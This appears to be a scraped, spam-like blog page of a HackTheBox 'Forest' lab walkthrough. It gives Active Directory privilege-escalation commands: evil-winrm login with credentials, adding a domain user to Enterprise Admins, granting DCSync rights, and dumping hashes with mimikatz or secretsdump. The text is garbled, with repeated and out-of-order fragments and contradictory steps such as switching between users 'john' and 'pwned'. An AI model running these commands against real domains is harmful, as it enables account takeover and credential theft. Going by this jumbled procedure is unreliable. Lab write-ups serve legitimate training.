cd C:\Users\Administrator\Desktop type root.txt
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('htb.local\john', $pass) Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
Since svc-account is part of the Account Operators group, we can create a new user and escalate them to Admin. 1. Create a new user powershell net user pwned Password123! /add /domain Use code with caution. 2. Add user to Enterprise Admins powershell net group "Enterprise Admins" pwned /add /domain Use code with caution. 3. Dump Hashes (DCSync)
The results reveal a (Ticket-Granting Ticket) that can be used to gain access to the domain.
Get-DomainGroupMember -Identity "Exchange Windows Permissions"
Now, use mimikatz or impacket-secretsdump to perform DCSync:
10.10.10.161 (Replace with your spawned instance IP)
This is a classic privilege escalation chain. Our user has sufficient permissions to add a new user to the Exchange Windows Permissions group.
Forest Hackthebox Walkthrough Best
cd C:\Users\Administrator\Desktop type root.txt
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('htb.local\john', $pass) Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync forest hackthebox walkthrough best
Since svc-account is part of the Account Operators group, we can create a new user and escalate them to Admin. 1. Create a new user powershell net user pwned Password123! /add /domain Use code with caution. 2. Add user to Enterprise Admins powershell net group "Enterprise Admins" pwned /add /domain Use code with caution. 3. Dump Hashes (DCSync)
The results reveal a (Ticket-Granting Ticket) that can be used to gain access to the domain. cd C:\Users\Administrator\Desktop type root
Get-DomainGroupMember -Identity "Exchange Windows Permissions"
Now, use mimikatz or impacket-secretsdump to perform DCSync: /add /domain Use code with caution
10.10.10.161 (Replace with your spawned instance IP)
This is a classic privilege escalation chain. Our user has sufficient permissions to add a new user to the Exchange Windows Permissions group.
Loaded All Posts
Not found any posts
VIEW ALL
Readmore
Reply
Cancel reply
Delete
By
Home
PAGES
POSTS
View All
RECOMMENDED FOR YOU
LABEL
ARCHIVE
SEARCH
ALL POSTS
Not found any post match with your request
Back Home
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sun
Mon
Tue
Wed
Thu
Fri
Sat
January
February
March
April
May
June
July
August
September
October
November
December
Jan
Feb
Mar
Apr
May
Jun
Jul
Aug
Sep
Oct
Nov
Dec
just now
1 minute ago
$$1$$ minutes ago
1 hour ago
$$1$$ hours ago
Yesterday
$$1$$ days ago
$$1$$ weeks ago
more than 5 weeks ago
Followers
Follow
THIS PREMIUM CONTENT IS LOCKED
STEP 1: Share to a social network
STEP 2: Click the link on your social network
Copy All Code
Select All Code
All codes were copied to your clipboard
Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy
Table of Content